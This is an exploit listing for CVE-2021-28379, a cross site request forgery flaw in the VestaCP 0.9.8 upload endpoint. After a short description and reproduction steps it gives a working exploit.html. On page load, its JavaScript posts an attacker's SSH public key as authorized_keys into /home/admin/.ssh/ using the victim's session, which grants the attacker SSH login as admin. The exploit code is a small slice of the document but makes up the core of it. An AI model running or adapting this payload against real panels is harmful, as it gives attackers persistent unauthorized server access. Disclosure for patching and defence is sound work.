VestaCP 0.9.8 Cross Site Request Forgery

VestaCP version 0.9.8 suffers from a cross site request forgery that can be leveraged to add remote ssh access.

MD5 | 0cd72aff04a0cdb12d80f6b96cd818ed

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
# Exploit Author: Fady Othman
# Date: 16-03-2021
# Vendor Homepage:
# Software Link:
# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
# CVE ID: CVE-2021-28379
# Patch:

## Description
I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.

I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.

Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.

Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"

## Steps to reproduce.
1. Install the latest version of VestaCP in your machine by following the instructions at
2. Login as the admin in Firefox, then open "exploit.html".
3. ssh into the machine using 'ssh -i id_rsa [email protected]', now you have access as admin.

# exploit.html


function exploit() {
var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= [email protected]`;
var fileContent = new Blob([mystring], {
type: 'text/plain'
myFormData = new FormData();
myFormData.append("files", fileContent, "authorized_keys");
fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
method: "post",
body: myFormData,
credentials: "include"
}); }


<body onload="exploit();">


Related Posts